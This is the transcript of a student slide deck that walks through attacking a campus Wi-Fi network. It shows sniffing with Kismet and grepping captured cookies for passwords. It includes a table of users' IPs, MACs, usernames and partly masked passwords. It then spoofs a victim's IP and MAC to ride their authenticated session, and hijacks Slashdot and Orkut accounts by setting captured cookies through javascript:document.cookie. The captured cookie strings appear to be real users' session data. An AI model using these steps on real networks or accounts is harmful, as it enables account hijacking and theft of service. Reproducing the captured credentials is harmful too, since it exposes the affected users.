+ All Categories
Home > Technology > Smit WiFi_2

Smit WiFi_2

Date post: 25-May-2015
Category:
Upload: mutew
View: 681 times
Download: 9 times
Share this document with a friend
Popular Tags:
46
Down the rabbit-hole a sneak peek at the SMIT-WiFi implementation Amit Saraff Ashish Shekhar
Transcript
Page 1: Smit WiFi_2

Down the rabbit-hole

a sneak peek at the SMIT-WiFi implementation

Amit SaraffAshish Shekhar

Page 2: Smit WiFi_2

Tools Used

• Nmap – network scanner• Wireshark / Ethereal - packet analyzer• Kismet – wireless sniffer• BurpSuite – proxy (http header modifier)• Firefox – web-browser

– Live HTTP Headers– User Agent Switcher– Tamper Data– View Cookie CS– NoScript

• Unix tools – wget, curl, ssh, ifconfig etc.• Intel Centrino-based laptop running

Slackware 9

Page 3: Smit WiFi_2

Brief Overview

• IP Range :- 172.16.183.0/22• WEP / WPA – no (yes !!)• 4 different essid's -

– SMITWiFi1– SMITWiFi2– SMITWiFi3– SMITWiFi4– different essid's / same

channel ??

Page 4: Smit WiFi_2

Brief Overview (cont..)

• 172.16.183.1 – router / DNS resolver / authenticator

• 172.16.183.2 – 802.11b Access Point

• 172.16.183.3 – D-link DWL-900 AP+ (standard 802.11bg ap)

• 172.16.183.4 – (new) Another access-point ?

Page 6: Smit WiFi_2

Initial Monitoring (cont..)

• and web addresses– www.orkut.com– www.cisco.com– www.wipro.com– www.musicgamesrefer.com– www.grisoft.com– www.yahoo.com– And some more orkut !!

Page 7: Smit WiFi_2

But that's not what we are looking for !!

Page 8: Smit WiFi_2

Wall of Sheep

IP MAC User Password172.16.183.15 00:12:f0:db:ef:6f d205a m_-_-i172.16.183.23 00:12:f0:64:0a:67 g205a b_-_i172.16.183.78 00:13:ce:7b:d7:9b d108a 1_3172.16.183.116 00:16:ce:54:69:48 b206a j_-n172.16.183.117 00:12:f0:56:b7:3f k205a n_-_-_-w172.16.183.149 00:15:00:22:c4:0f l205a p_-_-_-_4172.16.183.155 00:13:02:43:2b:0d r305a r_-_-_a172.16.183.180 00:12:f0:51:3b:e0 j301a h_-_-_-a

** and this is just a small part of the list

How about some user account details?

Page 9: Smit WiFi_2

So how did this happen ?

Page 10: Smit WiFi_2

172.16.183.1 – Authentication Server

Page 11: Smit WiFi_2

Talk about multi-platform support

Page 12: Smit WiFi_2

User – Agent Switcher to the rescue

Page 13: Smit WiFi_2

Background magic – how it really works

Page 14: Smit WiFi_2

How hard is it?

• Log the network traffic using Kismet• And run - • 'strings Kismet*.dump|grep Cookie|egrep “_Pass=[a-zA-Z0-9]+;” '

• to get :Cookie: _UserName=m301a; _Pass=123;

JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293

Cookie: _UserName=r703a; _Pass=manisha;JSESSIONID=2914445C961B072A73498FDCC1CEB9AE

Page 15: Smit WiFi_2

But that isn't very ethical

• Problem – How to get access to the internet without compromising another's account ?

• Solution – Study the entire process and find a work-around.

Page 16: Smit WiFi_2

Brief Introduction to Cookies

No not these “cookies”

Page 17: Smit WiFi_2

So what are they ?

• Parcels of text sent by a server to a web-browser and then sent unchanged back by the browser each time it accesses the server.

• Used for authenticating, tracking and maintaining specific information about users.

• We saw an example 2-3 slides back.– For those who “missed it” here it is again :

Cookie:_UserName=m301a;_Pass=123;JSESSIONID=975DCC46FE52BC0A3CEFDA8E5

68A7293

Page 18: Smit WiFi_2

How do they help?

• The SMIT server sets a cookie on each client it authenticates.

• Refreshes it every 180 seconds.• How do I then get this cookie ?• And how will it help even if I do

manage to capture it ?

Page 19: Smit WiFi_2

Step 1

Find active hosts on the network:enter 'Kismet'

Page 20: Smit WiFi_2

Step 1 (cont..)

Page 21: Smit WiFi_2

Step 2

Select an active host and note parametersie. IP Address and MAC address.

Page 22: Smit WiFi_2

Step 2 (cont..)

Change settings locally to match host about to be compromised.

For eg :ifconfig eth1 172.16.183.209 hw ether 00:13:02:C1:28:D4

route add default gw 172.16.183.1

Page 23: Smit WiFi_2

Step 3

• Fire up your browser – Firefox in our case.

• Type in the following URL :

http://172.16.183.1/24online/webpages/clientlogin.jsp?loginstatus=true&logoutstatus=null&message=&liverequesttime=180&livemessage=null&url=&isAccessDenied=null&fromlogout=null

• This acts as a 'refresh' command to the server which replies back with the validated cookie.

Page 24: Smit WiFi_2

..to get

Page 25: Smit WiFi_2

..and we are online

Page 26: Smit WiFi_2

Step 3 (cont..)

• What this does :– Sets you up with the “cookie”– Refreshes itself every 180 seconds– Voila, you have free internet access (until

the guy logs off / you log him off)

• Node goes offline ?– Rinse and repeat the entire process with

another IP.

Page 27: Smit WiFi_2

Return to cookie-land

• Authentication mechanisms– We just saw an abuse of the implicit trust

mechanism guaranteed by cookies– But that was local– Can it be extended to other sites too?

Page 28: Smit WiFi_2

Presenting Slashdot

• Popular technology portal.• News site for anything regarding

Technology / Linux / Politics / Science / YRO – Your Rights Online and more.

• Uses HTTP-POST mechanism for sending authentication data.

Page 29: Smit WiFi_2

The main page

Page 30: Smit WiFi_2

Login page

Page 31: Smit WiFi_2

Cookie

Page 32: Smit WiFi_2

Exploit -

• To authenticate as that user simply capture the incoming cookie

• Then in the address-bar type in :

javascript:document.cookie='user=609178::Ik2zsyezqK6AIER7rLuyD7; Domain=.slashdot.org;

Path=/';

Page 33: Smit WiFi_2

Result ?

Page 34: Smit WiFi_2

So what ?

But then that is hardly any sweat !!

Page 35: Smit WiFi_2

Moving on - orkut.com

• What is orkut ?– Social networking site.– Online community to meet new

people and keep in touch with old ones.

– Now part of the Google empire.– On in “atleast” 15 of the 20 or

so computers in the campus cyber-cafe at any time of the day.

Page 36: Smit WiFi_2

Main page.

Page 37: Smit WiFi_2

First observations.

• Note – The address-bar is yellow and there is a

lock-sign on the taskbar.– What it means :

• Site uses Secure-HTTP (Port 443 / https)• Certificate for validation (AES-256 bit

encryption)• Trusted certificate issuer – Thawte Consulting

cc.

– Actual login frame URL :https://www.google.com/accounts/ServiceLoginBox?

service=orkut&nui=2&uilel=1&skipvp age=true&msg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&hl=en-US

Page 38: Smit WiFi_2

In other words – that information is definitely not being cracked anytime

soon.

Page 39: Smit WiFi_2

Cookies, again?

• Cookie generated on login :

Page 40: Smit WiFi_2

Cookies, again ? (cont..)

• 2 cookies set by the orkut domain– First one seems to be a user preference

cookie– Second one is for timezone (??)

Page 41: Smit WiFi_2

Cookie (1)

• Question : Does Cookie 1 alone do the trick then ?

• Solution : Grab another cookie and check.

Page 42: Smit WiFi_2

Back to kismet dumps

• Hunt for a cookie in the previous gathered logs.

strings Kismet-*dump|grep Cookie|greporkut -i

• To get :Cookie:

orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:

Page 43: Smit WiFi_2

Set this cookie

javascript:document.cookie='

orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:; Domain=.orkut.com;

Path=/';

Page 44: Smit WiFi_2

To get :

Notice self-post!

Page 45: Smit WiFi_2

Future possibilities ?

• Setup a HTTP server and masquerade as 172.16.183.1 in order to capture logins.

• Attack the hardware itself(vulnerabilities in the server / access-points).

• Ban certain clients from access (arp-flooding).

• Put the laptop in “Master” mode to route traffic through it.

Page 46: Smit WiFi_2

Thank you ___________________

Questions ?


Recommended